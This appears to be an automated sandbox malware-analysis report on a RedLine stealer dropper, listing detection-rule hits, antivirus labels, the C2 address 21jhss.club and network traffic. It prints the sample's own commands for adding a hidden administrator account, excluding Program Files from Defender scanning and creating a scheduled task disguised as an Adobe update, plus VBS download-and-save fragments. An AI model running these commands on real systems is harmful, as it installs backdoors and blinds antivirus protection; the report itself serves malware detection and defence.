              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5804, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ProcessId: 1860, ProcessName: cscript.exe
              Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\cscript.exe, ProcessId: 1860, TargetFilename: C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup Administrators fsUIwEqMAc /add, CommandLine: net localgroup Administrators fsUIwEqMAc /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup Administrators fsUIwEqMAc /add, ProcessId: 4364, ProcessName: net.exe
              Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, ProcessId: 3624, ProcessName: net.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentImage: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentProcessId: 5020, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", ProcessId: 2932, ProcessName: cmd.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.199.111.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6972, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49842
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", CommandLine: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6256, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", ProcessId: 6304, ProcessName: schtasks.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5804, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ProcessId: 1860, ProcessName: cscript.exe
              Source: Registry Key setAuthor: frack113: Data: Details: 2048, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6972, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\DefaultSecureProtocols
              Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, ProcessId: 3624, ProcessName: net.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"", CommandLine: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"", ProcessId: 180, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:20:46.785463+010020283713Unknown Traffic192.168.2.449842185.199.111.133443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 21jhss.club:80Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Roaming\UeNuQ\939.vbsAvira: detection malicious, Label: VBS/Dldr.Agent.VPGN
              Source: C:\Users\user\AppData\Roaming\UeNuQ\578.vbsAvira: detection malicious, Label: VBS/Agent.4358
              Source: 19.2.RegAsm.exe.580000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["21jhss.club:80"], "Bot Id": "adsbb"}
              Source: 8lOT1rXZp5.exeVirustotal: Detection: 53%Perma Link
              Source: 8lOT1rXZp5.exeReversingLabs: Detection: 52%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
              Source: 8lOT1rXZp5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Windows\System32\wscript.exeDirectory created: C:\Program Files\RDP Wrapper\
              Source: C:\Windows\System32\wscript.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.bat
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49842 version: TLS 1.2
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00409A19 ??2@YAPAXI@Z,FindFirstFileW,FindClose,0_2_00409A19
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004044EA FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_004044EA
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040340F FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040340F
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040352A FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_0040352A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9E334 GetFileAttributesW,FindFirstFileW,FindClose,7_2_00C9E334
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_00CAA32C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA65AE FindFirstFileW,FindNextFileW,FindClose,7_2_00CA65AE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,7_2_00CA72A6
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA7205 FindFirstFileW,FindClose,7_2_00CA7205
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00C9D7CC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00C9DB0B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00CA9E43
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00CA9F9E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6E334 GetFileAttributesW,FindFirstFileW,FindClose,10_2_00A6E334
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A7A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A7A32C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A765AE FindFirstFileW,FindNextFileW,FindClose,10_2_00A765AE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A772A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,10_2_00A772A6
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A77205 FindFirstFileW,FindClose,10_2_00A77205
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A6D7CC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A6DB0B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A79E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A79E43
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A79F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A79F9E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060E334 GetFileAttributesW,FindFirstFileW,FindClose,13_2_0060E334
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0061A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_0061A32C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_006165AE FindFirstFileW,FindNextFileW,FindClose,13_2_006165AE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00617205 FindFirstFileW,FindClose,13_2_00617205
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_006172A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,13_2_006172A6
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0060D7CC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0060DB0B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00619E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00619E43
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00619F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00619F9E

              Networking

              barindex
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.111.133 443
              Source: Malware configuration extractorURLs: 21jhss.club:80
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: adodb.Write xmlHttp.ResponseBodyJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: adodb.SaveToFile nameJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: "obf_objADOStream.Write obf_objXMLHTTP.ResponseBody" & vbCrLf & _Jump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: "obf_objADOStream.SaveToFile obf_path" & vbCrLf & _Jump to dropped file
              Source: C:\Windows\SysWOW64\cscript.exeDropped file: oZ.Write BR.ResponseBodyJump to dropped file
              Source: C:\Windows\SysWOW64\cscript.exeDropped file: oZ.SaveToFile qRJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: Yara matchFile source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
              Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 185.199.111.133:443
              Source: global trafficHTTP traffic detected: GET /asmtron/rdpwrap/master/bin/autoupdate.bat HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: raw.githubusercontent.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAD672 InternetReadFile,SetEvent,GetLastError,SetEvent,7_2_00CAD672
              Source: global trafficHTTP traffic detected: GET /asmtron/rdpwrap/master/bin/autoupdate.bat HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: raw.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlan
              Source: global trafficDNS traffic detected: DNS query: lYvskCQZEcQueZ.lYvskCQZEcQueZ
              Source: global trafficDNS traffic detected: DNS query: bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv
              Source: global trafficDNS traffic detected: DNS query: 21jhss.club
              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Rifiutare.exe.com, 00000009.00000000.1706363695.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Uno.exe.com, 0000000A.00000000.1707300131.0000000000AD5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
